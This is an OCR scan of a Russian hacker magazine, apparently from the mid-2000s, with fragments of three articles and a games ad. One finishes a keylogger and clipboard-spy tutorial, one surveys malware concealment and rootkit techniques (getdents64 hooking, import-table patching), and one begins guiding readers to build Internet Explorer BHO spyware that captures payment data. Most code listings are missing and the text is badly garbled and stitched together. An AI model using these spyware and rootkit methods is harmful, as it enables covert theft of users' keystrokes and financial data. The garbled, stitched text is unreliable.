биты, а затем производим сдвиг на 8 бит влево. 
Функция GetKeyNameText особых комментариев 
не требует, а вот перед вызовом функции ТоАзсй 
требуется выполнить дополнительную операцию: 
опросить состояние клавиатуры при помощи функ- 
ции GetKeyboardState, передав полученный ре- 


в следующем номере: 
Алгоритмы и структуры данных. 
Советы бывалых кодеров. 
Отладчики и дизассемблеры. 


зультат в качестве третьего параметра функции 
ToAscii. GetKeyboardState получает указатель на 
массив размером 256 байт. Каждый байт массива 
заполняется кодом состояния соответствующей 
виртуальной клавиши. 

Наконец, завершающим штрихом является 
написание обработчика сообщений. Как отмеча- 
лось выше, система может автоматически снять ло- 
вушку. Однако при этом она посылает установив- 
шему ловушку приложению сообщение WM_CAN- 
CELJOURNAL. Следовательно, для организации 
бесперебойного слежения за клавиатурой необхо- 
димо отслеживать сообщения Tuna WM_CANCEL- 
JOURNAL и при их получении производить повтор- 
ную установку ловушки. 


Итак, в результате у нас получился достаточно 
простой шпион, работоспособный в Windows 9x и 
МТ, да ктому же не использующий DLL. Последний 
факт затрудняет отлов подобных кейлоггеров — 
отловить такой кейлоггер можно двумя методами: 

1 Установить в систему монитор, который бу- 
дет отслеживать факт установки ловушек. 

2 Применить отладочную ловушку с типом 
WH_DEBUG. Ловушка данного типа вызывается 
перед любой другой ловушкой, что позволяет 
производить мониторинг использования ловушек 
и блокировать их работу. 

Поговорив о клавиатурном шпионе в чистом 
виде, следует упомянуть о другой важной функции 
современных кейлоггеров — слежении за буфе- 
ром обмена. Это важная составляющая шпиона- 
жа, так как в буфере обмена может содержаться 
весьма интересная информация. Известно три ос- 
новных метода шпионажа за буфером обмена: 

1 Периодический опрос содержимого буфе- 
ра. Самый простой и лобовой метод, по сути, ана- 
логичен слежению за клавиатурой путем ее ци- 
клического опроса с высокой скоростью. 

2 Регистрация окна шпиона при помощи 
функции SetClipboardViewer в качестве так назы- 
ваемого «просмотрщика буфера обмена». Это на- 


иболее корректный и документированный путь на- 
блюдения за буфером обмена. 

з Слежение за буфером обмена по руткит- 
принципу, путем перехвата соответствующих функ- 
ций и мониторинга их вызова. 

Метод на базе SetClipboardViewer является 
наиболее простым с точки зрения реализации, по- 
этому заслуживает подробного рассмотрения. 
Для начала немного теории. Регистрируемые при 
помощи SetClipboardViewer окна образуют цепоч- 
ку просмотрщиков. При этом система запоминает 
хендл окна, установленный при помощи последне- 
го успешного вызова SetClipboardViewer в «голо- 
ве» цепочки, а хендл первого окна цепочки воз- 
вращает вызывающему SetClipboardViewer прило- 
жение. Далее при изменении буфера обмена си- 
стема передает сообщение типа WM_DRAWCLIP- 
BOARD последнему из зарегистрированных прос- 
мотрщиков. При получении сообщения он его об- 
рабатывает, а затем (что важно!) пересылает по- 
следующему в цепочке окну. Тот, в свою очередь, 
передает далее, и так до конца цепочки. Понятное 
дело, что если одно из окон-просмотрщиков будет 
разрушено, то цепочка прервется. На этот случай 
предусмотрена функция ChangeClipboardChain, 
позволяющая удалить окно из цепочки перед его 
разрушением. После вызова этой функции все за- 
регистрированные в цепочке окна получают сооб- 
щение WM_CHANGECBCHAIN и, в случае необхо- 
димости, хранящийся у них хендл следующего в 
цепочке окна. 

Практическая реализация вышесказанного 
достаточно проста. Для начала необходим код, ре- 
гистрирующий окно в цепочке в момент его созда- 
ния окна и исключающий его из цепочки в момент 
его разрушения. Этот код имеет вид: 


После регистрации окно начнет получать сооб- 
щения двух видов — WM_CHANGECBCHAIN 
и WM_DRAWCLIPBOARD, — поэтому для ux об- 
работки потребуются два метода: 


GECBCHAIN является корректировка хендла сле- 
дующего в цепочке окна в случае его разрушения, 
что реализуется следующим кодом: 


Соответственно, обработчик WM_DRAWCLIPBO- 
ARD содержит код шпиона, который должен опро- 
сить содержимое буфера обмена и внести его в 
протокол. В простейшем случае этот код сводится 
к следующему: 


Данный пример просто добавляет содержимое буфе- 
ра обмена к протоколу. Более сложная реализация 
может предполагать проверку на предмет повторов. 
> выводы. Первый и основной состоит в том, 
что кейлоггер достаточно просто написать само- 
стоятельно. Как следствие, методики сигнатурно- 
го поиска для охоты на клавиатурный шпион ма- 
лоэффективны. В качестве наилучшего метода 
борьбы можно посоветовать применение одного 
из описанных антикейлоггеров совместно с анти- 
руткитом. Однако даже это не даст 100% защиты 
от шпиона. Кроме того, следует учитывать, что 
многие антируткиты не отслеживают регистрацию 
функций KeServiceDescriptorlableShadow и слай- 
синг их кода — это дает еще два метода внедре- 
ния шпиона. Поэтому на данный момент никакой 
антикейлоггер не заменит тщательного анализа 
системы вручную! © 
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в прятки 
с бондом 


> — зарождение вирусной маскировки. Первые 
компьютерные зловреды появились еще в середи- 
не семидесятых. Большинство вирусов того вре- 
мени кроме собственного распространения по но- 
сителям информации больше ничего не делали. 
Например, действием легендарного вируса Сгее- 
рег было лишь обнаружение себя путем выдачи 
сообщения «!т the creeper : catch me if you can». 
Ситуацию изменила все большая популярность 
персональных компьютеров. Вирусы эволюциони- 
ровали, набирали все большую функциональ- 
ность, становились все изощреннее. В 1986 году 
была зарегистрирована первая вирусная эпиде- 
мия. Вирус Вгат поразил огромное по тому време- 
ни количество 1ВМ-совместимых компьютеров. 
Распространение вируса было вызвано возмож- 
ностью распространения вируса на дискетах. 
Вгат заражал загрузочные секторы дискет и тем 
самым быстро пошел по рукам. Вгат не обладал 


СПОСОБЫ COKPbITUA КОДА В СИСТЕМЕ 


ЕЩЕ ЛЕТ ДЕСЯТЬ НАЗАД ЗЛОВРЕДНЫЕ ПРОГРАММЫ ПОДРАЗДЕЛЯЛИСЬ НА ДВА ВИДА: 
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ВИДОВ И ПОДВИДОВ ЗЛОВРЕДОВ УВЕЛИЧИЛОСЬ НА ПОРЯДОК. ЧЕГО ТОЛЬКО 

НЕ ВСТРЕТИШЬ В ДИКОЙ ПРИРОДЕ: И СЕТЕВЫЕ ЧЕРВИ, И РАЗНООБРАЗНЫЕ 
ШПИОНСКИЕ ПРОГРАММЫ КЛАССА SPYWARE, И НЕЖЕЛАТЕЛЬНЫЕ РЕКЛАМНЫЕ 
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РАСПРОСТРАНЯЮТСЯ, НО И УСПЕШНО МАСКИРУЮТСЯ ОТ ПОЛЬЗОВАТЕЛЯ, СИСТЕМЫ 
И АНТИВИРУСНЫХ ПРОГРАММ, ИСПОЛЬЗУЯ САМЫЕ ИЗОЩРЕННЫЕ МЕТОДЫ. 

О СПОСОБАХ СОКРЫТИЯ ПРОГРАММ МЫ И ПОГОВОРИМ В ДАННОЙ СТАТЬЕ 


Андрей Семенюченко 


isemuha @ тай.ги 


никакими деструктивными действиями, зато OH 
был первой программой, скрывающей себя в си- 
стеме, то есть первым руткитом! Не верите? На- 
прасно, поскольку при чтении загрузочного секто- 
ра Вгат перехватывал системные функции досту- 
па к диску и подставлял на место зараженных дан- 
ных заранее сохраненный оригинал. 

Уже в начале 90-х появились первые предста- 
вители полиморфных вирусов. А что это, если не 
попытка спрятаться от антивируса и других систем- 
ных утилит? Первым полиморфиком считается ви- 
pyc Chameleon, который содержал в своем теле ал- 
горитм самошифрации. Причем он изменял не 
только внешний вид самого тела, но и расшифров- 
щика. Антивирусное сообщество, конечно же, не 


сдавалось, и вскоре были придуманы специальные 
алгоритмические языки, позволяющие распознать 
полиморфик в зараженном файле. Тогда же Евге- 
ний Касперский изобрел процессорный эмулятор 
для дешифрации кодов, что явилось еще более эф- 
фективной технологией борьбы с полиморфными 
вирусами. Откровенно говоря, 90-е года ознамено- 
вались большим прогрессом в развитии полиморф- 
ных вирусов. Чего стоило появление целых поли- 
морфик-генераторов, поставляемых в виде гото- 
вых объектников и документации, чтобы облегчить 
жизнь коллегам. Наверняка у многих было на слуху 
имя Dark Avenger. Эта личность стала кумиром и 
классиком для многих хакеров после изобретения 
мощнейшего полиморфного генератора МЕ. 


Дальше — больше. Со временем появля- 
лось все больше вирусов, пытающихся противо- 
стоять антивирусным программам и скрыться от 
них. Так, вирус Peach, появившийся в 1992 году, 
перед совершением злодеяний удалял антивиру- 
сную базу установленного антивируса. Таким об- 
разом, антивирус не мог ничего обнаружить. По- 
мимо вирусов, появляются другие виды зловре- 
дов, например утилиты скрытого администриро- 
вания backdoors. Именно в 1998 году появился на- 
шумевший BackOrifice (Backdoor.BO), предста- 
вляющий из себя утилиту скрытого (хакерского) 
администрирования удаленных компьютеров и 
сетей. Позднее в 2000 году вышла новая, более 
продвинутая версия BackOrifice BO2k, напугав- 


шая бедных пользователей, поскольку обещала 
полную маскировку внутри системы. 

Интересным фактом стало появление интер- 
нет-червя ZippedFiles, разновидность которого 
скрывалась от антивирусов благодаря тому, что 
тело червя было сжато утилитой компрессии Neoli- 
{е. На тот момент ни один антивирус не поддержи- 
вал формат сжатия Neolite (кстати сказать, исполь- 
зование таких пакеров — исторический метод, по- 
скольку одно время их было много, а антивирусы 
распаковывали только PKZip и LZExe. — Прим. Ло- 
зовского). Чуть позже появились первые бестелес- 
ные черви, создавшие серьезные проблемы раз- 
работчикам антивирусных программ благодаря то- 
му, что в процессе работы такие черви существуют 
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исключительно в системной памяти, а передаются 
на другие компьютеры в виде специальных пакет- 
ных данных. Антивирусным разработчикам приш- 
лось существенно дополнять стандартный антиви- 
русный монитор, работа которого была основана 
на перехвате именно файловых операций. 

> появление новых угроз. Несмотря на то, что, 
казалось бы, компьютерные зловреды довольно 
сильно продвинулись в эволюционном развитии к 
концу ХХ века, тем не менее, в начале нового века 
появляются все более изощренные технологии. 
Это связано, в первую очередь, с тем, что написа- 
ние вредоносных программ превратилось в при- 
быльный бизнес. Давай попробуем ответить на во- 
прос, кто создавал вирусы раньше, а кто — сейчас? 
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Если раньше вирусы писали в основном одиночки 
с целью позабавиться, потешить собственное эго, 
попробовать свои силы, то сейчас это чаще всего 
высоко организованные хакерские группы, пре- 
следующие четкие цели. Их не интересует ба- 
нальное издевательство или совершение де- 
структивных действий на компьютере жертве 
(если только за это не платят :)). Они лишь зара- 
батывают деньги любым доступным способом — 
легальным или нелегальным. И таких способов, 
кстати, в интернете предостаточно. Это и рассы- 


опасность легальных 
руткитов 


ВСЕ МЫ ПОМНИМ ИСТОРИЮ ОБ 
ОБНАРУЖЕНИИ РУТКИТА 

В ОВМ-МОДУЛЕ МУЗЫКАЛЬНЫХ ДИСКОВ 
КОМПАНИИ SONY. ОСНОВНОЙ ИДЕЕЙ 
РУТКИТА БЫЛО ВНЕДРЕНИЕ 
ПРОГРАММОЙ ЗАЩИТЫ ОТ 
КОПИРОВАНИЯ БРИТАНСКОЙ КОМПАНИИ 
FIRST 4 INTERNET. КАЗАЛОСЬ БЫ, 
ВПОЛНЕ НЕВИННАЯ ЗАТЕЯ. МНОГИЕ 
ДАЖЕ НЕ ДУМАЛИ ПРИДАВАТЬ ЭТОМУ 
ФАКТУ БОЛЬШОГО ЗНАЧЕНИЯ. НО 
РЕАЛЬНО СЛОЖИЛАСЬ СИТУАЦИЯ, 
КОГДА НЕСКОЛЬКО СОТЕН ТЫСЯЧ 
КОМПЬЮТЕРОВ ВО ВСЕМ МИРЕ 
ОКАЗАЛИСЬ ОСНАЩЕНЫ СРЕДСТВАМИ 
ДЛЯ СКРЫТИЯ ФАЙЛОВ И ПРОЦЕССОВ 
В СИСТЕМЕ ОТ ПОЛЬЗОВАТЕЛЯ. 
ФАКТИЧЕСКИ ЭТО ОЗНАЧАЛО, 

ЧТО ЛЮБОЙ ФАЙЛ, НАЧИНАЮЩИЙСЯ 
С «$SYS$», СТАНОВИЛСЯ НЕВИДИМЫМ 
ДЛЯ СТАНДАРТНЫХ СРЕДСТВ. 

ЭТО И БЫЛО ДОКАЗАНО НА ПРАКТИКЕ 
С ПОЯВЛЕНИЕМ БЭКДОРА 
BACKDOOR.WIN32.BREPLIBOT.B, 
ЭКСПЛУАТИРОВАВШЕГО ВОЗНИКШУЮ 
УЯЗВИМОСТЬ. БЭКДОР РАССЫЛАЛСЯ 
ПРИ ПОМОЩИ СПАМ-РАССЫЛКИ 

И УСТАНАВЛИВАЛ СЕБЯ 

В СИСТЕМНЫЙ КАТАЛОГ С ИМЕНЕМ, 
НАЧИНАЮЩИМСЯ НА $SYS$ 
($SYS$DRV.EXE). СООТВЕТСТВЕННО, 
ОНБЫЛНЕ ЗАМЕТЕН НА КОМПЬЮТЕРАХ 
С ФУНКЦИОНИРУЮЩЕЙ ОВМ-ЗАЩИТОЙ 
OT SONY И СОВЕРШАЛ СВОИ 
ЗЛОДЕЯНИЯ. ЗА ВВЕРИВОТ 
ПОСЛЕДОВАЛИ И ДРУГИЕ, ЕЩЕ БОЛЕЕ 
ОПАСНЫЕ ВИРУСЫ. МЫ НЕ БУДЕМ 
ОСУЖДАТЬ КОНКРЕТНОГО 
ПРОИЗВОДИТЕЛЯ, НО ХОТЕЛОСЬ 

БЫ ОБРАТИТЬ ТВОЕ ВНИМАНИЕ, 
НАСКОЛЬКО В СОВРЕМЕННОМ 
ИНФОРМАЦИОННОМ МИРЕ НУЖНО 
БЫТЬ ОСТОРОЖНЫМ 

ПРИ ВНЕДРЕНИИ ЛЮБОЙ ТЕХНОЛОГИИ. 


лка спама, и фишинг, и компьютерный шпионаж, 
и создание бот-сетей. 

Но у авторов вредоносных программ всегда 
была одна большая проблема, связанная с не- 
возможностью длительного сохранения присут- 
ствия стороннего кода в системе, незаметной как 
для пользователя, так и для антивирусных 
средств. Решение этой проблемы воплощено в 
создании целого класса вредоносных программ: 
руткитов, полиморфных вирусов, невидимых IM- 
червей, вирусов, скрывающихся в стримах ntfs и 
многих других. 
> технологии руткитов. Считается, что в среде 
UNIX вредоносные программы пока не получили 
такого распространения, как в Windows, однако 
именно оттуда пришел термин rootkit, который 
сейчас часто используется для обозначения Ste- 
alth-TexHonorui, применяемых авторами троян- 
ских программ под Windows. 

С целью скрытия вредоносных действий 
хакера подменяются системные исполняемые 
файлы, такие как ifconfig, ps, top, login, Is, netstat, 
или системные библиотеки типа libproc.a. Либо 
устанавливается модуль ядра, для того чтобы 
перехватить попытки пользователя получить ре- 
альную картинку состояния системы. Таким об- 
разом, различаются руткиты уровня приложений 
и уровня ядра. 

Руткиты уровня приложений, как правило, 
включают функции по работе с демоном регистра- 
ций событий в системе, обычно функции по отклю- 
чению syslogd; протрояненные системные утилиты 
и бэкдор, предоставляющий доступ в систему. 
Руткиты уровня ядра также скрывают свою рабо- 
ту, но на более низком уровне. Рассмотрим три 
способа установки ядерного руткита. 

1 Через модуль ядра (КМ. Пишется модуль 
ядра, изменяющий нужные системные вызовы, и 
подгружается ядром без перезагрузки системы. 

2 Через запись в уже существующий модуль 
ядра. Чаще всего модифицируются наиболее распро- 
страненные модули ядра, обычно загружающиеся на 
каждом уровне, такие как autofs, md5, scisi_mod, flop- 
ру. Благодаря этому можно будет загрузиться заново 
в случае внезапной перезагрузки системы. 

з Через запись в область памяти, занятой 
ядром. Дело в том, что существуют способы, по- 
зволяющие выяснить адрес области памяти, за- 
нятой некоторой частью ядра. После определе- 
ния адреса остается только осуществить запись 
в /dev/kmem. 

Попробуем разобрать наглядный пример ко- 
да LKM, скрывающий определенный файл от глаз 
сторонних утилит. Первое, что нам нужно опреде- 
лить, — какой системный вызов отвечает за чте- 
ние той или иной директории. Сделать это доволь- 
но просто. Нужно выполнить трассировку любой 
программы, считывающей содержимое директо- 
рии. Если такой программы под рукой нет, то мож- 
но самому написать элементарный код, состоящий 
из функций открытия и чтения директории: 


Пример фишинга. В ин-строке браузера мы видем 
сайт Раура!. Однако в правом верхнем углу браузер 
нам показывает реальный адрес сайта 


После проведения трассировки программы коман- 
дой Нгасе увидим, что одной из строк является: 


Функция getdents64 как раз и считывает содер- 
жимое каталога, а результат записывает в струк- 
туру типа struct dirent. Для того чтобы скрыть ка- 
кой-либо файл, нужно перехватить getdentsé4, 
найти в структуре dirent поля d_reclen и d_name, 
содержащие размер записи и имя файла, и за- 
тем удалить нужные записи. Ниже приведен при- 
мер с комментариями. 
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В Windows также распространены руткиты. При- 
чем обстроиться в этой среде зловреду будет го- 
раздо легче. Ведь большинство пользователей ра- 
ботают в системе с правами администратора, в то 
время как в юникс права root, необходимые для ин- 
сталляции подавляющего большинства rootkit, 
нужно еще получить с помощью использования 
уязвимостей. В Windows используются следующие 
пути сокрытия программ в системе: 

1 Использование внутренних структур опера- 
ционной системы. Внутренние структуры Windows 
недокументированны или слабо документирова- 


ДРУГИЕ НОВЕЙШИЕ 
ТЕХНОЛОГИИ МАСКИРОВКИ 


Технологии «0-дау» 

Основным критерием удачи сокрытия 
зловреда и продления его присутствия в 
системе является использование техноло- 
гий или уязвимостей, еще неизвестных 
компьютерному сообществу. Появление 
«zero-day» технологий представляет наи- 
большую опасность, поскольку производи- 
телю софта приходится тратить время на 
анализ проблемы и выпуск патча, в то вре- 
мя как в интернете уже активно распро- 
страняется вредоносный код. Чаще всего 
OT таких атак страдают серьезные корпора- 
ции, атакуемые извне «на заказ», по чьей- 
либо наводке. Хотя, например, знаменитая 
Изрпд-технология, наделавшая столько 
шума и заставившая попотеть антивиру- 
сных разработчиков, до сих пор тревожит 
покой именно простых пользователей. 
Вспомним также появившуюся не так дав- 
но технологию, скрывающую информацию 
в стримах ntfs. Напомню, что известный 
компьютерный вирус «Stream» включал 
способности по манипулированию допол- 
нительными потоками (ADS) файловой си- 
стемы NTFS. Опасными также становятся 
вирусы, работа которых практически не за- 
висит от действий пользователя. Почтовые 
черви, использующие уязвимость скрипто- 
вых движков Cross-site scripting различных 
популярных веб-ресурсов(веб-почта, бло- 
ги), могут активизироваться просто при по- 


сещении зараженной страницы сайта. Так, 
жертвами червя Уатаппег только в июне 
2006 года стали почти 200 миллионов 
пользователей веб-почты Уапоо!Май. Для 
активации червя достаточно было лишь от- 
крыть письмо в окне веб-браузера. Причем 
червю даже не требовалось проникновение 
на компьютер жертвы. При активации чер- 
вь рассылал себя по всем контактам атако- 
ванного пользователя. 


Полиморфные скрипты 

Полиморфные вирусы активно развива- 
лись до конца прошлого века. Несмотря на 
то, что вирусный полиморфизм прошел 
множество стадий своего развития: от про- 
стейшего побайтного хог до уникальных 
метаморфов, использующих сложнейшие 
криптографические алгоритмы. В конце 
концов полиморфики уступили пальму пер- 
венства более шустрым и проворным чер- 
вям и троянцам. Однако неожиданно мы 
стали очевидцами новой ступени эволюции — 
создании полиморфных скриптовых чер- 
вей. Проблема возникла с появлением у 
веб-мастеров технологии шифрования ко- 
да Ми!-страницы и тем самым прячущей ее 
от сторонних глаз. Некоторые авторы ши- 
фраторов страниц сделали код своих про- 
грамм полностью открытыми, чем способ- 
ствовали развитию вирусной индустрии в 
данном направлении. Вскоре появились 
очень опасные черви — Feebs и Scano, — 
распространяемые по почте в виде аттача, 
представляющего собой зашифрованный 


java-ckpunt. Трудность в поимке таких чер- 
вей антивирусами возникает из-за большо- 
го процента ложных срабатываний типа Fal- 
se positive, поскольку имеющиеся эвристи- 
ческие анализаторы могут признать вредо- 
носной программой вполне легальный за- 
шифрованный сайт. 


Социальная инженерия 

В пользу активного распространения червей 
Feebs и Scano сыграл тот факт, что пользо- 
ватели еще не привыкли к тому, что в html- 
файлах могут содержаться вирусы. Про- 
стые юзеры до сих пор считают, что все ви- 
русы распространяются в ехе-файлах и до- 
кументах формата .doc. Налицо факт co- 
циальной инженерии, используемый хакер- 
ским сообществом с целью более интенсив- 
ного распространения зловредов. 


Руткиты нового поколения 

Хакеры изобретают все новые и новые ла- 
зейки и технологии. Поэтому до последне- 
го времени они были на шаг впереди лю- 
бой антивирусной компании. Гонка воору- 
жений продолжается и сейчас. В антивиру- 
сы встраивают мощные проактивные тех- 
нологии, позволяющие детектировать да- 
же угрозы типа «0-day». Но, чтобы бороть- 
ся с хакерами, нужно мыслить, как хакеры, 
действовать, как хакеры. Для этого многие 
компании, специализирующиеся Ha IT-6e- 
зопасности, сами проводят исследования 
по возможности взлома систем, чтобы 
быть готовыми к защите от новых угроз. 


Одной из новейших разработок компании 
eEye Digital Security стало создание бэкдо- 
ра в загрузочном секторе винчестера, кото- 
рый может получить управление еще до за- 
пуска операционки. Сам понимаешь, что 
подобная возможность позволит бэкдору 
подменить многие системные вызовы опе- 
рационной системы. Компания Next-Gen- 
eration Security провела работу, результа- 
том которой было создание руткита во 
флэш-памяти BIOS. Создание такого рутки- 
та возможно через функции по управле- 
нию электропитанием компьютера ACPI, а 
обнаружение такого зловреда весьма за- 
труднительно. Microsoft также не отстает 
от коллег по цеху и спонсирует довольно 
интересный проект, разрабатываемый уни- 
верситетом штата Мичиган. Ребята пыта- 
ются реализовать проект руткита, работаю- 
щего ниже уровня операционной системы. 
Для этого на жесткий диск сначала устана- 
вливается так называемый монитор вирту- 
альных машин, который уже загружает 
операционку. Таким образом, поскольку 
управление от BIOS сначала попадает к не- 
му, монитор может выполнять любые дей- 
ствия как до, так и после загрузки оси. Тео- 
ретически антивирусу внутри операцион- 
ной системы будет просто невозможно об- 
наружить руткиты и зловреды на уровне 
монитора виртуальных машин. Однако в 
глаза бросается очевидная возможность 
обнаружить неладное другими способами, 
например, простой проверкой диска на 
другом компьютере. 
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ны, к тому же они меняются от версии к версии. 
Это сложная и трудоемкая работа, поскольку за- 
ставляет хакеров выполнять дополнительную ра- 
боту по анализу кода. Но игра стоит свеч, посколь- 
ку данный подход позволяет скрыть процесс от 
большинства специализированных утилит, в том 
числе, например, от ТазК Мападег. 

2 Перехват вызова АР!-функций и внедрение 
dil. Наиболее популярный метод. Существует нес- 
колько способов внедрения dil: внедрение с помо- 
щью ловушек, реестра, удаленных потоков. Но, 
несмотря Ha то, что внедрение DLL в адресное 
пространство процесса — это замечательный спо- 
соб узнать о том, что происходит в процессе, про- 
стое внедрение DLL не дает достаточной инфор- 
мации, а тем более не позволяет изменять пове- 
дение какой-либо функции. Таким образом, более 
эффективен и распространен метод перехвата 
вызова АР!-функций. Поскольку вызовы систем- 
ных АР!-функций производятся приложениями че- 
рез таблицы импорта/экспорта или через адрес, 
полученный с помощью функции GetProcAddress, 
то можно реализовать специальный код в а!-би- 
блиотеке, который будет внедряться в адресные 
пространства запущенных в системе процессов. 
Это позволит контролировать любое запущенное 
приложение. 

Использование таблиц импорта/экспорта яв- 
ляется предпочтительным, поскольку не прихо- 
дится писать на ассемблере и использовать ко- 
манду JUMP, зависящую от процессора. Един- 
ственное, что нам нужно знать, — это описание 
РЕ-заголовка и структуру раздела импорта. Если 
коротко, то таблица импорта содержит списки ад- 
ресов функций, импортируемых из различных dil. 
Данные адреса попадают в таблицу после загруз- 
ки в память исполняемого файла. Чтобы заменить 
определенную функцию, надо лишь изменить ее 
адрес в разделе импорта на адрес нашей функ- 
ции. Нужно заметить, что наша функция должна 
полностью совпадать с той функцией, которую мы 
хотим заменить, то есть все параметры и возвра- 
щаемое значение должны совпадать. 

Рассмотрим пример по замене адреса функ- 
ции завершения работы системы ExitWindowsEx 
в таблице импорта на адрес нашей функции: 


Uh Natal | 


APR 


$ 


это все? Итак, как ты видишь, в интернете 
идет настоящая информационная война. Кто вый- 
дет победителем — покажет время. Мы же дол- 
жны обладать достаточной и полной информаци- 
ей, чтобы вовремя среагировать даже на скрытые 
угрозы © 


http://en.wikipedia.org/wiki/Rootkit 
BOT какое определение руткиту дает wikipedia 


http:/Awww.chkrootkit.org 
такие утилиты Kak chkrootkit позволяют определить 
изменение ядра в работающей системе 


ПРАВИЛЬНЫЙ ЖУРНАЛ О КОМПЬЮТЕРНЫХ ИГРАХ 


ПРАВИЛЬНАЯ КОМПЛЕКТАЦИЯ: 2 ДВУХСЛОЙНЫХ DVD (общий объём 17 Gh), 2 ПОСТЕРА и 2 НАКЛЕЙКИ!!! 
fe) ПРАВИЛЬНЫЙ ОБЪЕМ: 240 СТРАНИЦ!!! 
=) НИКАКОГО МУСОРА И НЕВНЯТНЫХ ТЕМ, НАСТОЯЩИЙ ГЕЙМЕРСКИЙ РАЙ -— ТОЛЬКО РС ИГРЫ!!! 


rr мае раме 
В АВГУСТЕ: Se ди МИ 
‘4A Kup lie i i. 
Санитары Подземелий | ее 
Fallout по-русски: за дело берется Goblin. 
онлайновые игры 
Руководство пользователя: от покупки игры 


до основ геймплея. 


Prey 
Индейцы против инопланетян. Мы поиграли 
в знаменитый шутер-долгострой. 


Titan Quest 
От Греции до Китая — Diablo в древнем мире. 


ONMARHOBBIE МЫ 
FlatOut 2 м к, о ИТЕЛЬ =. 
Разбей тачку вдребезги в безбашенном гоночном may =: sdf. = 
симуляторе! во сто ада а a 


MEDIEVAL 2: 
А также: 
+ Превью: Supreme Commander, Need for Speed Carbon , 
Unreal Tournament 2007, Alone in the Dark, Stronghold 
Legends , Huxley , Shadowrun, Lego Star Wars Il, Bionicle 
Heroes, CivCity: Rome, Gods and Heroes, Reservoir Dogs, 
"Дом 3 Online"... 
* Рецензии на Тйап Quest, FlatOut 2, Guild Wars Factions, 
City Life, Barrow Hill, Auto Assault, Desperados 2, Rush for 
Berlin, Movies: Stunts & Effects, Glory of the Roman 
Empire, "Тайна да Винчи", Black & White 2: Battle of the 
Gods... 


И многое-многое другое! 
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ЕСЛИ ТЫ! ГЕЙМЕР — ты Е ПРОПУСТИШЬ! 
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> = что такое Browser Helper Object. В первую 
очередь, Browser Helper Object — это DLL, которая 
регистрируется в операционной системе Windows 
как дополнение ко всем известному Microsoft Inter- 
net Explorer (такое дополнение имеется у Get Right, 
Flyswats, Quiver, Blink, iHarvest и Godzilla). Идея 
«помощников» (helper — помощник), без сомне- 
ния, хороша (особенно для нас), потому что эта 
DLL может следить за действием пользователя, 
когда он находится в браузере или другом прило- 
жении, в котором установлен наш ВНО. Техноло- 
гию ВНО применяют многие приложения, и имен- 
но поэтому Browser Helper Objects является инте- 
реснейшей темой для разработчиков spyware. 

> — ВНО в разрезе. Технология BHO реализует- 
ся с помощью СОМ, поэтому DLL нашего хелпера — 
это не что иное, как внутризадачный СОМ-сервер, 
работающий в контексте процесса, подгрузивше- 
го его, и получающий полный доступ к объектам 
программы. С помощью |ObjectWithSite мы перех- 
ватим указатель на интерфейс !\ММебВго\изег2, ко- 
торый является родителем класса и отвечает за 
всю работу браузера! После того как мы сделаем 
все необходимые манипуляции, нам необходимо 


наолюдением 


ПИШЕМ SPYWARE НА ОСНОВЕ BHO 

IE - САМЫЙ ПОПУЛЯРНЫЙ БРАУЗЕР. А ЧТО ЛЮБЯТ ДЕЛАТЬ СОСТОЯТЕЛЬНЫЕ 
ПОЛЬЗОВАТЕЛИ? КАК НИ СТРАННО, ОПЛАЧИВАТЬ СЧЕТА, ПОКУПАТЬ РАЗЛИЧНЫЕ 
ТОВАРЫ — И ВСЕ ЭТО ОСУЩЕСТВЛЯЕТСЯ ЧЕРЕЗ ИНТЕРНЕТ. А ЧТО МЕШАЕТ ХАКЕРУ 
ПОДСМОТРЕТЬ ЗА ПОЛЬЗОВАТЕЛЕМ (НЕ СЧИТАЯ УК РФ)? ПОСМОТРИМ, КАК ЛЕГКО 
ВЗЛОМЩИК МОЖЕТ ПРОСЛЕДИТЬ ЗА ВСЕМ, ЧТО ПОЛЬЗОВАТЕЛЬ ДЕЛАЕТ 


В СВОЕМ БРАУЗЕРЕ 


Кочубей Павел ака zOrd 
ICQ: 291637112, www.offbit.1gb.ru 


записать ero в любую из переменных-членов 
объекта, после чего можем получить доступ к лю- 
бому объекту браузера. 
> функция функции рознь. Описывать все 
функции, которые теоретически могут войти в ВНО, 
просто нереально в пределах этого журнала, поэто- 
му определимся с конкретной задачей. Что обычно 
желает зло-программист? Он хочет получать дан- 
ные, которые вводит пользователь, особенно отно- 
сящиеся к системам платежей и е-тай адресам. 
Для того чтобы получить доступ к данным 
страницы, нам необходимо использовать метод 
get_Document, а параметром ему будет объект ин- 
терфейса |Dispatch. Далее необходимо создать 
указатель на IHTMLDocument2. В общем, все ос- 
новное будет ясно в процессе кодинга. 
> — строим BHO. Надеюсь, студия уже запуще- 
на? Значит — в бой. Создаем проект Win32 Appli- 
cation, выбираем ALT СОМ, а в визарде оставляем 
все по умолчанию, чтобы получить ALT COM-cep- 


вер. После создания проекта заходим в меню на 
Add ALT Objects и добавляем Internet Explorer Ob- 
ject. Как ни крути, а этими действиями мы новый 
мир не открыли, поэтому лезем в хидер и готовим- 
ся к программингу. 

В первую очередь, найдем описание класса ВНО. 
Если ты сделал проект, как описано выше, то полу- 
чилось нечто вроде: 


class ATL_NO_VTABLE CBHO: 

public CComObjectRootEx 
<CComSingleThreadModel>, 

public CComCoClass<CBHO, &CLSID_BHO>, 
public IObjectWithSiteImp1<CBHO>, 
public IDispatchImp1<IBHO, &IID_IBHO, 
&LIBID_TEPLUGINLib> 


Чтобы наши задумки в будущем осуществились, 
необходимо добавить декларации нескольких пе- 
ременных: 


Если в MSDN ввести onkeypress (это имя ме- 
Toga используется в MSDN 2005), то через него 
можно выйти на get_onkeypress, а если у тебя бо- 
лее старая версия — используй метод IHTMLEle- 
ment::onkeypress). 

Для подстраховки функции необходимо еще 
выдергивать данные из документов. Реализуется 
это через функцию get_Document, а параметром 
ему служит IDispatch. 

Сделать реализацию кода по моему описа- 


После подобного описания функций мы сможем 
без проблем получить доступ к любой части кода. 
Для этого необходимо воспользоваться методом 
де! Боду, принадлежащим к SOHTML. Теперь опи- 
шем функцию, которая, пожалуй, самая главная в 
написании spyware. 

Метод IHTMLElement славится своими клас- 


ция для нас очень важна — к ее изучению мы сей- 
час и приступим. Для начала необходимо создать 
буфер — там будет собираться вся выловленная у 
пользователя информация. Определим, в каких 
интерфейсах имеется событие Onkeypress: 


функции и свяжем их — будем считать, что полде- 
ла сделано: 
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public CComCoClass<CBHO, sCLSID_BHO>, 
public I0bjectWithSiteImp1<CBHO>, 
public IDispatchImp1<IBHO, ¢IID_IBHO, sLIBID_IEPLUGINLib> 

{ 

public: 

=] CBHO() 

{ 

} 


